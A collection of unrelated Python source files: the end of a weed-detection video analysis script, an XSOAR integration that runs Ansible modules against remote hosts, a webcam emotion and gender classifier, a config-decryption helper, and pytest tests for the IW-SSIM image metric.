if exhuframecount > 0:
exhuframecount -= 1
exhuFrame = exhuFramesAll[exhuframecount]
else:
exhuFrame = exhuFramesAll[exhuframecount]
# save current frames for the video comparison
if k == ord('y'):
cv2.imwrite('images/frameGrabs/{}_frame{}_exg.png'.format(baseName, exgframecount), exgFrame)
cv2.imwrite('images/frameGrabs/{}_frame{}_exgs.png'.format(baseName, exgsframecount), exgsFrame)
cv2.imwrite('images/frameGrabs/{}_frame{}_hue.png'.format(baseName, hueframecount), hueFrame)
cv2.imwrite('images/frameGrabs/{}_frame{}_exhu.png'.format(baseName, exhuframecount), exhuFrame)
print('[INFO] All frames written.')
# write text on each video frame
exgVis = exgFrame.copy()
exgsVis = exgsFrame.copy()
hueVis = hueFrame.copy()
exhuVis = exhuFrame.copy()
cv2.putText(exhuVis, 'exhu: {} / {}'.format(exhuframecount, lenexhu), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
cv2.putText(hueVis, 'hue: {} / {}'.format(hueframecount, lenhue), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
cv2.putText(exgsVis, 'exgs: {} / {}'.format(exgsframecount, lenexgs), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
cv2.putText(exgVis, 'exg: {} / {}'.format(exgframecount, lenexg), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
cv2.putText(hdFrame, 'HD: {} / {}'.format(hdframecount, lenHD), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
# stack the video frames
topRow = np.hstack((exgVis, exgsVis))
bottomRow = np.hstack((hueVis, exhuVis))
combined = np.vstack((topRow, bottomRow))
combined = np.hstack((combined, hdFrame))
cv2.imshow('Output', combined)
if k == 27:
break
def frame_processor(videoFeed, videoName):
frameShape = None
while True:
k = cv2.waitKey(1) & 0xFF
ret, frame = videoFeed.read()
if ret == False:
frame = np.zeros(frameShape, dtype='uint8')
if frameShape is None:
frameShape = frame.shape
if videoName == "hd":
yield frame
else:
cnts, boxes, weedCentres, imageOut = green_on_brown(frame, exgMin=29,
exgMax=200,
hueMin=30,
hueMax=92,
saturationMin=10,
saturationMax=250,
brightnessMin=60,
brightnessMax=250,
headless=False,
algorithm=videoName, minArea=10)
yield imageOut
if k == 27:
videoFeed.stop()
break
import pandas as pd
def blur_analysis(directory):
blurDict = {}
df = pd.DataFrame(columns=['field', 'algorithm', 'blur'])
for videoPath in glob.iglob(directory + '\*.mp4'):
allframeBlur = []
sampledframeBlur = []
video = FileVideoStream(videoPath).start()
frameCount = 0
while True:
frame = video.read()
if video.stopped:
meanBlur = np.mean(allframeBlur)
stdBlur = np.std(allframeBlur)
vidName = os.path.basename(videoPath)
fieldNameList = [vidName.split("-")[0] for i in range(100)]
print(fieldNameList)
algorithmNameList = [os.path.splitext(vidName.split("-")[2])[0] for i in range(100)]
for i in range(100):
randint = np.random.randint(0, len(allframeBlur))
sampledframeBlur.append(allframeBlur[randint])
df2 = pd.DataFrame(list(zip(fieldNameList, algorithmNameList, sampledframeBlur)), columns=['field', 'algorithm', 'blur'])
print(df2)
df = df.append(df2)
print(df)
df.to_csv(r"videos\blur\blurriness.csv")
blurDict[vidName] = [meanBlur, stdBlur]
break
greyscale = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
blurriness = cv2.Laplacian(greyscale, cv2.CV_64F).var()
allframeBlur.append(blurriness)
frameCount += 1
print(vidName, ',', np.round(meanBlur, 2), ',', np.round(stdBlur, 2), ',', frameCount)
print(blurDict)
if __name__ == "__main__":
# RSilos 3 - DONE
# exgFile = r'videos/20210429-142930-HQ1-exg.avi'
# exgsFile = r'videos/20210429-143441-HQ1-exgs.avi'
# hueFile = r'videos/20210429-143559-HQ1-hue.avi'
# exhuFile = r'videos/20210429-143759-HQ1-exhu.avi'
# hdFile = r'videos/20210429_143950.mp4'
# # canola night 1
# exgFile = r'videos/20210429-174827-HQ2-exg.avi'
# exgsFile = r'videos/20210429-175001-HQ2-exgs.avi'
# hueFile = r'videos/20210429-175138-HQ2-hue.avi'
# exhuFile = r'videos/20210429-175307-HQ2-exhu.avi'
# hdFile = r'videos/20210429_175512.mp4'
# RWheat 1 - DONE
# exgFile = r'videos/20210429-145743-HQ1-exg.avi'
# exgsFile = r'videos/20210429-145942-HQ1-exgs.avi'
# hueFile = r'videos/20210429-150119-HQ1-hue.avi'
# exhuFile = r'videos/20210429-150254-HQ1-exhu.avi'
# hdFile = r'videos/20210429_150543.mp4'
# CSU Sheep 1 - DONE
# exgFile = r'videos/blur/CSUSheep1-HQ1-exg.mp4'
# exgsFile = r'videos/blur/CSUSheep1-HQ1-exgs.mp4'
# hueFile = r'videos/blur/CSUSheep1-HQ1-hue.mp4'
# exhuFile = r'videos/blur/CSUSheep1-HQ1-exhu.mp4'
# hdFile = r'videos/20210430_110451.mp4'
# DPI 3 - DONE
# exgFile = r'videos/blur/DPI3-HQ2-exg.mp4'
# exgsFile = r'videos/blur/DPI3-HQ1-exgs.mp4'
# hueFile = r'videos/blur/DPI3-HQ1-hue.mp4'
# exhuFile = r'videos/blur/DPI3-HQ1-exhu.mp4'
# hdFile = r'videos/20210430_094837.mp4'
# LD Day
# exgFile = r'videos/20210507-143847-HQ2-exg.avi'
# exgsFile = r'videos/20210507-144117-HQ2-exgs.avi'
# hueFile = r'videos/20210507-144241-HQ2-hue.avi'
# exhuFile = r'videos/20210507-144407-HQ2-exhu.avi'
# hdFile = r'videos/20210507_144808.mp4'
# LD Night
# exgFile = r'videos/20210506-184104-HQ2-exg.avi'
# exgsFile = r'videos/20210506-183237-HQ2-exgs.avi'
# hueFile = r'videos/20210506-183417-HQ2-hue.avi'
# exhuFile = r'videos/20210506-183601-HQ2-exhu.avi'
# hdFile = r'videos/20210506_183834.mp4'
# frame_analysis(exgFile=exgFile,
# exgsFile=exgsFile,
# hueFile=hueFile,
# exhuFile=exhuFile,
# HDFile=hdFile)
# blur analysis
directory = r"videos/blur"
blur_analysis(directory=directory)
|
1620187
|
from CommonServerPython import * # noqa: F403
from CommonServerUserPython import * # noqa: F403
import ansible_runner # pylint: disable=E0401
import json
from typing import Dict, cast, List, Union, Any
# Dict to Markdown Converter adapted from https://github.com/PolBaladas/torsimany/
def dict2md(json_block: Union[Dict[str, Union[dict, list]], List[Union[str, dict, list, float]], float], depth: int = 0):
markdown = ""
if isinstance(json_block, dict):
markdown = parse_dict(json_block, depth)
if isinstance(json_block, list):
markdown += parse_list(json_block, depth)
return markdown
def parse_dict(d: Dict[str, Union[dict, list]], depth: int):
markdown = ""
# In the case of a dict of dicts/lists, we want to show the "leaves" of the tree first.
# This will improve readability by avoiding the scenario where "leaves" are shown in between
# "branches", resulting in their relation to the header to become unclear to the reader.
for k in d:
if not isinstance(d[k], (dict, list)):
markdown += build_value_chain(k, d.get(k), depth + 1)
for k in d:
if isinstance(d[k], (dict, list)):
markdown += add_header(k, depth + 1)
markdown += dict2md(d[k], depth + 1)
return markdown
def parse_list(rawlist: List[Union[str, dict, list, float]], depth: int):
markdown = ""
default_header_value = "list"
for value in rawlist:
if not isinstance(value, (dict, list)):
index = rawlist.index(value)
item_depth = depth + 1 # since a header was added previously items should be idented one
markdown += build_value_chain(index, value, item_depth)
else:
# It makes list more readable to have a header of some sort
header_value = find_header_in_dict(value)
if header_value is None:
header_value = default_header_value
markdown += add_header(header_value, depth)
if isinstance(value, dict):
markdown += parse_dict(value, depth)
if isinstance(value, list):
markdown += parse_list(value, depth)
return markdown
def find_header_in_dict(rawdict: Union[Dict[Any, Any], List[Any]]):
header = None
# Finds a suitible value to use as a header
if not isinstance(rawdict, dict):
return header # Not a dict, nothing to do
id_search = [val for key, val in rawdict.items() if 'id' in key]
name_search = [val for key, val in rawdict.items() if 'name' in key]
if id_search:
header = id_search[0]
if name_search:
header = name_search[0]
return header
def build_header_chain(depth: int):
list_tag = '* '
htag = '#'
tab = " "
chain = (tab * depth) + list_tag * (bool(depth)) + htag * (depth + 1) + ' value\n'
return chain
def build_value_chain(key: Union[int, str], value: Union[str, int, float, Dict[Any, Any], List[Any], None], depth: int):
tab = ' '
list_tag = '* '
chain = (tab * depth) + list_tag + str(key) + ": " + str(value) + "\n"
return chain
def add_header(value: str, depth: int):
chain = build_header_chain(depth)
chain = chain.replace('value', value.title())
return chain
# Remove ansible branding from results
def rec_ansible_key_strip(obj: Dict[Any, Any]):
if isinstance(obj, dict):
return {key.replace('ansible_', ''): rec_ansible_key_strip(val) for key, val in obj.items()}
return obj
# Convert to TitleCase, like .title() but only letters/numbers.
def title_case(st: str):
output = ''.join(x for x in st.title() if x.isalnum())
return output
def generate_ansible_inventory(args: Dict[str, Any], int_params: Dict[str, Any], host_type: str = "local"):
host_types = ['ssh', 'winrm', 'nxos', 'ios', 'local']
if host_type not in host_types:
raise ValueError("Invalid host type. Expected one of: %s" % host_types)
sshkey = ""
inventory: Dict[str, dict] = {}
inventory['all'] = {}
inventory['all']['hosts'] = {}
# local
if host_type == 'local':
inventory['all']['hosts']['localhost'] = {}
inventory['all']['hosts']['localhost']['ansible_connection'] = 'local'
# All other host types are remote
elif host_type in ['ssh', 'winrm', 'nxos', 'ios']:
hosts = args.get('host')
if type(hosts) is str:
# host arg could be csv
hosts = [host.strip() for host in hosts.split(',')] # type: ignore[union-attr]
for host in hosts: # type: ignore[union-attr]
new_host = {}
new_host['ansible_host'] = host
if ":" in host:
address = host.split(':')
new_host['ansible_port'] = address[1]
new_host['ansible_host'] = address[0]
else:
new_host['ansible_host'] = host
if int_params.get('port'):
new_host['ansible_port'] = int_params.get('port')
# Common SSH based auth options
if host_type in ['ssh', 'nxos', 'ios']:
# SSH Key saved in credential manager selection
if int_params.get('creds', {}).get('credentials').get('sshkey'):
username = int_params.get('creds', {}).get('credentials').get('user')
sshkey = int_params.get('creds', {}).get('credentials').get('sshkey')
new_host['ansible_user'] = username
# Password saved in credential manager selection
elif int_params.get('creds', {}).get('credentials').get('password'):
username = int_params.get('creds', {}).get('credentials').get('user')
password = int_params.get('creds', {}).get('credentials').get('password')
new_host['ansible_user'] = username
new_host['ansible_password'] = password
# username/password individually entered
else:
username = int_params.get('creds', {}).get('identifier')
password = int_params.get('creds', {}).get('password')
new_host['ansible_user'] = username
new_host['ansible_password'] = password
# ssh specific become options
if host_type == 'ssh':
new_host['ansible_become'] = int_params.get('become')
new_host['ansible_become_method'] = int_params.get('become_method')
if int_params.get('become_user'):
new_host['ansible_become_user'] = int_params.get('become_user')
if int_params.get('become_password'):
new_host['ansible_become_pass'] = int_params.get('become_password')
# ios specific
if host_type == 'ios':
new_host['ansible_connection'] = 'network_cli'
new_host['ansible_network_os'] = 'ios'
new_host['ansible_become'] = 'yes'
new_host['ansible_become_method'] = 'enable'
new_host['ansible_become_password'] = int_params.get('enable_password')
inventory['all']['hosts'][host] = new_host
# nxos specific
elif host_type == 'nxos':
new_host['ansible_connection'] = 'network_cli'
new_host['ansible_network_os'] = 'nxos'
new_host['ansible_become'] = 'yes'
new_host['ansible_become_method'] = 'enable'
inventory['all']['hosts'][host] = new_host
# winrm
elif host_type == 'winrm':
# Only two credential options
# Password saved in credential manager selection
if int_params.get('creds', {}).get('credentials').get('password'):
username = int_params.get('creds', {}).get('credentials').get('user')
password = int_params.get('creds', {}).get('credentials').get('password')
new_host['ansible_user'] = username
new_host['ansible_password'] = password
# username/password individually entered
else:
username = int_params.get('creds', {}).get('identifier')
password = int_params.get('creds', {}).get('password')
new_host['ansible_user'] = username
new_host['ansible_password'] = password
new_host['ansible_connection'] = "winrm"
new_host['ansible_winrm_transport'] = "ntlm"
new_host['ansible_winrm_server_cert_validation'] = "ignore"
inventory['all']['hosts'][host] = new_host
return inventory, sshkey
def generic_ansible(integration_name: str, command: str,
args: Dict[str, Any], int_params: Dict[str, Any], host_type: str,
creds_mapping: Dict[str, str] = None) -> CommandResults:
"""Run a Ansible module and return the results as a CommandResult.
Keyword arguments:
integration_name -- the name of the XSOAR integration. Used for context output structure
command -- the ansible module to run
args -- the XSOAR command args. Literally the demisto.args(). The args provided need to match the
ansible module args, as well as include the arg "host" if the module is one that connects
to a host.
int_params -- the integration parameters. These will contain args that are integration wide.
They will passed to the the ansible module as args, with exception of credentials,
these will be used to build the ansible inventory.
host_type -- the type of host that is being managed. The following host types are supported:
* ssh -- Linux or Unix variant managed over ssh
* winrm -- Windows
* nxos -- Cisco NX-OS based network device
* ios -- Cisco IOS based network device
* local -- this indicates that the command should be executed locally.
Mostly used by modules that connect out to cloud services.
creds_mapping -- A mapping for the 'creds' param names to expected ansible param names
"""
readable_output = ""
sshkey = ""
fork_count = 1 # default to executing against 1 host at a time
if args.get('concurrency'):
fork_count = cast(int, args.get('concurrency'))
# generate ansible host inventory
inventory, sshkey = generate_ansible_inventory(args=args, host_type=host_type, int_params=int_params)
module_args = ""
# build module args list
for arg_key, arg_value in args.items():
# skip hardcoded host arg, as it doesn't related to module
if arg_key == 'host':
continue
# special condition for if there is a collision between the host argument used for ansible inventory
# and the host argument used by a module
if arg_key == 'ansible-module-host':
arg_key = 'host'
module_args += "%s=\"%s\" " % (arg_key, arg_value)
# If this isn't host based, then all the integration params will be used as command args
if host_type == 'local':
for arg_key, arg_value in int_params.items():
# if given creds param and a cred mapping - use the naming mapping to correct the arg names
if arg_key == 'creds' and creds_mapping:
if arg_value.get('identifier') and 'identifier' in creds_mapping:
module_args += "%s=\"%s\" " % (creds_mapping.get('identifier'), arg_value.get('identifier'))
if arg_value.get('password') and 'password' in creds_mapping:
module_args += "%s=\"%s\" " % (creds_mapping.get('password'), arg_value.get('password'))
else:
module_args += "%s=\"%s\" " % (arg_key, arg_value)
r = ansible_runner.run(inventory=inventory, host_pattern='all', module=command, quiet=True,
omit_event_data=True, ssh_key=sshkey, module_args=module_args, forks=fork_count)
results = []
outputs_key_field = ''
for each_host_event in r.events:
# Troubleshooting
# demisto.log("%s: %s\n" % (each_host_event['event'], each_host_event))
if each_host_event['event'] in ["runner_on_ok", "runner_on_unreachable", "runner_on_failed"]:
# parse results
result = json.loads('{' + each_host_event['stdout'].split('{', 1)[1])
host = each_host_event['stdout'].split('|', 1)[0].strip()
status = each_host_event['stdout'].replace('=>', '|').split('|', 3)[1]
# if successful build outputs
if each_host_event['event'] == "runner_on_ok":
if 'fact' in command:
result = result['ansible_facts']
else:
if result.get(command) is not None:
result = result[command]
else:
result.pop("ansible_facts", None)
result = rec_ansible_key_strip(result)
if host != "localhost":
readable_output += "# %s - %s\n" % (host, status)
else:
# This is integration is not host based
readable_output += "# %s\n" % status
readable_output += dict2md(result)
# add host and status to result if it is a dict. Some ansible modules return a list
if (type(result) == dict) and (host != 'localhost'):
result['host'] = host
outputs_key_field = 'host' # updates previous outputs that share this key, neat!
if (type(result) == dict):
result['status'] = status.strip()
results.append(result)
if each_host_event['event'] == "runner_on_unreachable":
msg = "Host %s unreachable\nError Details: %s" % (host, result.get('msg'))
if each_host_event['event'] == "runner_on_failed":
msg = "Host %s failed running command\nError Details: %s" % (host, result.get('msg'))
if each_host_event['event'] in ["runner_on_failed", "runner_on_unreachable"]:
return_error(msg)
return CommandResults(
readable_output=readable_output,
outputs_prefix=integration_name + '.' + title_case(command),
outputs_key_field=outputs_key_field,
outputs=results
)
|
1620226
|
import cv2
import numpy as np
import os.path
from cv2 import WINDOW_NORMAL
from face_detection import find_faces
ESC = 27
def start_webcam(model_emotion, model_gender, window_size, window_name='live', update_time=50):
cv2.namedWindow(window_name, WINDOW_NORMAL)
if window_size:
width, height = window_size
cv2.resizeWindow(window_name, width, height)
video_feed = cv2.VideoCapture(0)
video_feed.set(3, width)
video_feed.set(4, height)
read_value, webcam_image = video_feed.read()
delay = 0
init = True
while read_value:
read_value, webcam_image = video_feed.read()
for normalized_face, (x, y, w, h) in find_faces(webcam_image):
if init or delay == 0:
init = False
emotion_prediction = model_emotion.predict(normalized_face)
gender_prediction = model_gender.predict(normalized_face)
if (gender_prediction[0] == 0):
cv2.rectangle(webcam_image, (x,y), (x+w, y+h), (0,0,255), 2)
else:
cv2.rectangle(webcam_image, (x,y), (x+w, y+h), (255,0,0), 2)
cv2.putText(webcam_image, emotions[emotion_prediction[0]], (x,y-10), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,0,0), 2)
delay += 1
delay %= 20
cv2.imshow(window_name, webcam_image)
key = cv2.waitKey(update_time)
if key == ESC:
break
cv2.destroyWindow(window_name)
def analyze_picture(model_emotion, model_gender, path, window_size, window_name='static'):
cv2.namedWindow(window_name, WINDOW_NORMAL)
cv2.namedWindow(window_name, WINDOW_NORMAL)
if window_size:
width, height = window_size
cv2.resizeWindow(window_name, width, height)
image = cv2.imread(path, 1)
for normalized_face, (x, y, w, h) in find_faces(image):
emotion_prediction = model_emotion.predict(normalized_face)
gender_prediction = model_gender.predict(normalized_face)
if (gender_prediction[0] == 0):
cv2.rectangle(image, (x,y), (x+w, y+h), (0,0,255), 2)
else:
cv2.rectangle(image, (x,y), (x+w, y+h), (255,0,0), 2)
cv2.putText(image, emotions[emotion_prediction[0]], (x,y-10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,255), 2)
cv2.imshow(window_name, image)
key = cv2.waitKey(0)
if key == ESC:
cv2.destroyWindow(window_name)
if __name__ == '__main__':
emotions = ["afraid", "angry", "disgusted", "happy", "neutral", "sad", "surprised"]
# Load model
fisher_face_emotion = cv2.face.FisherFaceRecognizer_create()
fisher_face_emotion.read('models/emotion_classifier_model.xml')
fisher_face_gender = cv2.face.FisherFaceRecognizer_create()
fisher_face_gender.read('models/gender_classifier_model.xml')
# Use model to predict
choice = input("Use webcam?(y/n) ")
if (choice == 'y'):
window_name = "Facifier Webcam (press ESC to exit)"
start_webcam(fisher_face_emotion, fisher_face_gender, window_size=(1280, 720), window_name=window_name, update_time=15)
elif (choice == 'n'):
run_loop = True
window_name = "Facifier Static (press ESC to exit)"
print("Default path is set to data/sample/")
print("Type q or quit to end program")
while run_loop:
path = "../data/sample/"
file_name = input("Specify image file: ")
if file_name == "q" or file_name == "quit":
run_loop = False
else:
path += file_name
if os.path.isfile(path):
analyze_picture(fisher_face_emotion, fisher_face_gender, path, window_size=(1280, 720), window_name=window_name)
else:
print("File not found!")
else:
print("Invalid input, exiting program.")
|
1620247
|
import os
import logging
from getpass import getpass
from skcom.crypto import decrypt_text
def main():
logger = logging.getLogger('helper')
cfg_path = os.path.expanduser(r'~\.skcom\skcom.yaml')
try:
# 解密
with open(cfg_path + '.enc', 'rb') as enc_file:
secret = enc_file.read()
password = getpass('請輸入設定檔密碼: ')
plain = decrypt_text(secret, password)
# 儲存明文設定檔, 刪除加密設定檔
with open(cfg_path, 'w', encoding='utf-8') as cfg_file:
cfg_file.write(plain)
os.remove(cfg_path + '.enc')
logger.info('解密完成')
except Exception as ex:
logger.error(ex)
if __name__ == '__main__':
main()
|
1620281
|
import torch
import itertools
import pytest
from piq import InformationWeightedSSIMLoss, information_weighted_ssim
from typing import Tuple, List
from skimage.io import imread
from contextlib import contextmanager
@contextmanager
def raise_nothing(enter_result=None):
yield enter_result
@pytest.fixture(scope='module')
def x_rand() -> torch.Tensor:
return torch.rand(3, 3, 161, 161)
@pytest.fixture(scope='module')
def y_rand() -> torch.Tensor:
return torch.rand(3, 3, 161, 161)
@pytest.fixture(scope='module')
def ones_zeros_4d() -> Tuple[torch.Tensor, torch.Tensor]:
return torch.ones(3, 3, 161, 161), torch.zeros(3, 3, 161, 161)
@pytest.fixture(scope='module')
def test_images() -> List[Tuple[torch.Tensor, torch.Tensor]]:
x_grey = torch.tensor(imread('tests/assets/goldhill_jpeg.gif')).unsqueeze(0).unsqueeze(0)
y_grey = torch.tensor(imread('tests/assets/goldhill.gif')).unsqueeze(0).unsqueeze(0)
x_rgb = torch.tensor(imread('tests/assets/I01.BMP')).permute(2, 0, 1).unsqueeze(0)
y_rgb = torch.tensor(imread('tests/assets/i01_01_5.bmp')).permute(2, 0, 1).unsqueeze(0)
return [(x_grey, y_grey), (x_rgb, y_rgb)]
@pytest.fixture(scope='module')
def scale_weights() -> torch.Tensor:
return torch.tensor([0.0448, 0.2856, 0.3001, 0.2363, 0.1333])
# ================== Test function: `information_weighted_ssim` ==================
def test_iw_ssim_measure_is_one_for_equal_tensors(x_rand: torch.Tensor, device: str) -> None:
x_rand = x_rand.to(device)
y_rand = x_rand.clone()
measure = information_weighted_ssim(x_rand, y_rand, data_range=1.)
assert torch.allclose(measure, torch.ones_like(measure)), \
f'If equal tensors are passed IW-SSIM must be equal to 1 ' \
f'(considering floating point operation error up to 1 * 10^-6), got {measure + 1}'
def test_iw_ssim_reduction(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str) -> None:
for mode in ['mean', 'sum', 'none']:
information_weighted_ssim(x_rand.to(device), y_rand.to(device), reduction=mode)
for mode in [None, 'n', 2]:
with pytest.raises(ValueError):
information_weighted_ssim(x_rand.to(device), y_rand.to(device), reduction=mode)
def test_iw_ssim_raises_if_tensors_have_different_shapes(x_rand: torch.Tensor, y_rand: torch.Tensor,
scale_weights: torch.Tensor, device: str) -> None:
dims = [[3], [2, 3], [160, 161], [160, 161]]
for size in list(itertools.product(*dims)):
wrong_shape_x = torch.rand(size).to(x_rand)
print(wrong_shape_x.size())
if wrong_shape_x.size() == x_rand.size():
information_weighted_ssim(wrong_shape_x.to(device), x_rand.to(device))
else:
with pytest.raises(AssertionError):
information_weighted_ssim(wrong_shape_x.to(device), x_rand.to(device))
information_weighted_ssim(x_rand.to(device), y_rand.to(device), scale_weights=scale_weights.to(device))
wrong_scale_weights = torch.rand(2, 2)
with pytest.raises(ValueError):
information_weighted_ssim(x_rand.to(device), y_rand.to(device), scale_weights=wrong_scale_weights.to(device))
def test_iw_ssim_raises_if_tensors_have_different_types(x_rand: torch.Tensor, device: str) -> None:
wrong_type_x = list(range(10))
with pytest.raises(AssertionError):
information_weighted_ssim(wrong_type_x, x_rand.to(device))
def test_iw_ssim_raises_if_kernel_size_greater_than_image(x_rand: torch.Tensor, y_rand: torch.Tensor,
device: str) -> None:
kernel_size = 11
levels = 5
min_size = (kernel_size - 1) * 2 ** (levels - 1) + 1
wrong_size_x = x_rand[:, :, :min_size - 1, :min_size - 1]
wrong_size_y = y_rand[:, :, :min_size - 1, :min_size - 1]
with pytest.raises(ValueError):
information_weighted_ssim(wrong_size_x.to(device), wrong_size_y.to(device), kernel_size=kernel_size)
@pytest.mark.parametrize(
"data_range", [128, 255],
)
def test_iw_ssim_supports_different_data_ranges(x_rand: torch.Tensor, y_rand: torch.Tensor, data_range: int,
device: str) -> None:
x_scaled = (x_rand * data_range).type(torch.uint8)
y_scaled = (y_rand * data_range).type(torch.uint8)
measure_scaled = information_weighted_ssim(x_scaled.to(device), y_scaled.to(device), data_range=data_range)
measure = information_weighted_ssim(
x_scaled.to(device) / float(data_range),
y_scaled.to(device) / float(data_range),
data_range=1.0
)
diff = torch.abs(measure_scaled - measure)
assert (diff <= 1e-6).all(), f'Result for same tensor with different data_range should be the same, got {diff}'
def test_iw_ssim_fails_for_incorrect_data_range(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str) -> None:
# Scale to [0, 255]
x_scaled = (x_rand * 255).type(torch.uint8)
y_scaled = (y_rand * 255).type(torch.uint8)
with pytest.raises(AssertionError):
information_weighted_ssim(x_scaled.to(device), y_scaled.to(device), data_range=1.0)
@pytest.mark.parametrize(
"dtype", [torch.float32, torch.float64],
)
def test_iw_ssim_preserves_dtype(x_rand: torch.Tensor, y_rand: torch.Tensor, dtype: torch.dtype, device: str) -> None:
output = information_weighted_ssim(x_rand.to(device=device, dtype=dtype), y_rand.to(device=device, dtype=dtype))
assert output.dtype == dtype
def test_iw_ssim_corresponds_to_matlab(test_images: List, device: str):
x_gray, y_gray = test_images[0]
x_rgb, y_rgb = test_images[1]
matlab_gray = torch.tensor(0.886297251092821, device=device)
matlab_rgb = torch.tensor(0.946804801436296, device=device)
score_gray = information_weighted_ssim(x_gray.to(device), y_gray.to(device), data_range=255)
assert torch.isclose(score_gray, matlab_gray, atol=1e-5),\
f'Expected {matlab_gray:.4f}, got {score_gray:.4f} for gray scale case.'
score_rgb = information_weighted_ssim(x_rgb.to(device), y_rgb.to(device), data_range=255)
assert torch.isclose(score_rgb, matlab_rgb, atol=1e-5),\
f'Expected {matlab_rgb:.8f}, got {score_rgb:.8f} for rgb case.'
# ================== Test class: `InformationWeightedSSIMLoss` ==================
def test_iw_ssim_loss_is_one_for_equal_tensors(x_rand: torch.Tensor, device: str) -> None:
x_rand = x_rand.to(device)
y_rand = x_rand.clone()
loss = InformationWeightedSSIMLoss(data_range=1.)
measure = loss(x_rand, y_rand)
assert torch.allclose(measure, torch.zeros_like(measure), atol=1e-5), \
f'If equal tensors are passed IW-SSIM must be equal to 0 ' \
f'(considering floating point operation error up to 1 * 10^-5), got {measure}'
def test_iw_ssim_loss_reduction(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str) -> None:
for mode in ['mean', 'sum', 'none']:
loss = InformationWeightedSSIMLoss(reduction=mode)
loss(x_rand.to(device), y_rand.to(device))
for mode in [None, 'n', 2]:
with pytest.raises(ValueError):
loss = InformationWeightedSSIMLoss(reduction=mode)
loss(x_rand.to(device), y_rand.to(device))
def test_iw_ssim_loss_raises_if_tensors_have_different_shapes(x_rand: torch.Tensor, y_rand: torch.Tensor,
scale_weights: torch.Tensor, device: str) -> None:
dims = [[3], [2, 3], [160, 161], [160, 161]]
loss = InformationWeightedSSIMLoss(data_range=1.)
for size in list(itertools.product(*dims)):
wrong_shape_x = torch.rand(size).to(x_rand)
print(wrong_shape_x.size())
if wrong_shape_x.size() == x_rand.size():
loss(wrong_shape_x.to(device), x_rand.to(device))
else:
with pytest.raises(AssertionError):
loss(wrong_shape_x.to(device), x_rand.to(device))
loss = InformationWeightedSSIMLoss(data_range=1., scale_weights=scale_weights.to(device))
loss(x_rand.to(device), y_rand.to(device))
wrong_scale_weights = torch.rand(2, 2)
loss = InformationWeightedSSIMLoss(data_range=1., scale_weights=wrong_scale_weights.to(device))
with pytest.raises(ValueError):
loss(x_rand.to(device), y_rand.to(device))
def test_iw_ssim_loss_raises_if_tensors_have_different_types(x_rand: torch.Tensor, device: str) -> None:
wrong_type_x = list(range(10))
loss = InformationWeightedSSIMLoss(data_range=1.)
with pytest.raises(AssertionError):
loss(wrong_type_x, x_rand.to(device))
def test_iw_ssim_loss_raises_if_kernel_size_greater_than_image(x_rand: torch.Tensor, y_rand: torch.Tensor,
device: str) -> None:
kernel_size = 11
levels = 5
min_size = (kernel_size - 1) * 2 ** (levels - 1) + 1
wrong_size_x = x_rand[:, :, :min_size - 1, :min_size - 1]
wrong_size_y = y_rand[:, :, :min_size - 1, :min_size - 1]
loss = InformationWeightedSSIMLoss(data_range=1., kernel_size=kernel_size)
with pytest.raises(ValueError):
loss(wrong_size_x.to(device), wrong_size_y.to(device))
@pytest.mark.parametrize(
"data_range", [128, 255],
)
def test_iw_ssim_loss_supports_different_data_ranges(x_rand: torch.Tensor, y_rand: torch.Tensor, data_range: int,
device: str) -> None:
x_scaled = (x_rand * data_range).type(torch.uint8)
y_scaled = (y_rand * data_range).type(torch.uint8)
loss = InformationWeightedSSIMLoss(data_range=1.)
loss_scaled = InformationWeightedSSIMLoss(data_range=data_range)
measure_scaled = loss_scaled(x_scaled.to(device), y_scaled.to(device))
measure = loss(
x_scaled.to(device) / float(data_range),
y_scaled.to(device) / float(data_range)
)
diff = torch.abs(measure_scaled - measure)
assert (diff <= 1e-6).all(), f'Result for same tensor with different data_range should be the same, got {diff}'
def test_iw_ssim_loss_fails_for_incorrect_data_range(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str) -> None:
# Scale to [0, 255]
x_scaled = (x_rand * 255).type(torch.uint8)
y_scaled = (y_rand * 255).type(torch.uint8)
loss = InformationWeightedSSIMLoss(data_range=1.)
with pytest.raises(AssertionError):
loss(x_scaled.to(device), y_scaled.to(device))
@pytest.mark.parametrize(
"dtype", [torch.float32, torch.float64],
)
def test_iw_ssim_loss_preserves_dtype(x_rand: torch.Tensor, y_rand: torch.Tensor, dtype: torch.dtype,
device: str) -> None:
loss = InformationWeightedSSIMLoss(data_range=1.)
output = loss(x_rand.to(device=device, dtype=dtype), y_rand.to(device=device, dtype=dtype))
assert output.dtype == dtype
def test_iw_ssim_loss_corresponds_to_matlab(test_images: List, device: str):
x_gray, y_gray = test_images[0]
x_rgb, y_rgb = test_images[1]
matlab_gray = 1 - torch.tensor(0.886297251092821, device=device)
matlab_rgb = 1 - torch.tensor(0.946804801436296, device=device)
loss = InformationWeightedSSIMLoss(data_range=255)
score_gray = loss(x_gray.to(device), y_gray.to(device))
assert torch.isclose(score_gray, matlab_gray, atol=1e-5),\
f'Expected {matlab_gray:.8f}, got {score_gray:.8f} for gray scale case.'
score_rgb = loss(x_rgb.to(device), y_rgb.to(device))
assert torch.isclose(score_rgb, matlab_rgb, atol=1e-5),\
f'Expected {matlab_rgb:.8f}, got {score_rgb:.8f} for rgb case.'
def test_iw_ssim_loss_backprop(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str):
x_rand.requires_grad_(True)
loss = InformationWeightedSSIMLoss(data_range=1.)
score_gray = loss(x_rand.to(device), y_rand.to(device))
score_gray.backward()
assert torch.isfinite(x_rand.grad).all(), f'Expected finite gradient values, got {x_rand.grad}.'
|
1620309
|
from main import absorbdict
# 送信元または宛先IPがAnyかつそのゾーンがUntrust以外の場合そのポリシーはリストに(Any*2)個追加する
# 送信元または宛先IPがVIPかつプロトコルがANYの場合そのポリシーはリストに(該当するVIP)個追加する
